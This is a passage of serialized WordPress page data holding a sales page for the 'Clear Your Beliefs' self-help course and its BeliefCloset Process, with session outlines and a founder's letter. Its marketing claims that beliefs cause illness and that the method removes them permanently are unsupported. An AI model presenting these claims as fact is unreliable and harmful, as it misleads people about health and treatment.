happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60620:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n \n\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n \n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n \n\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n \n\n&nbsp;\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" 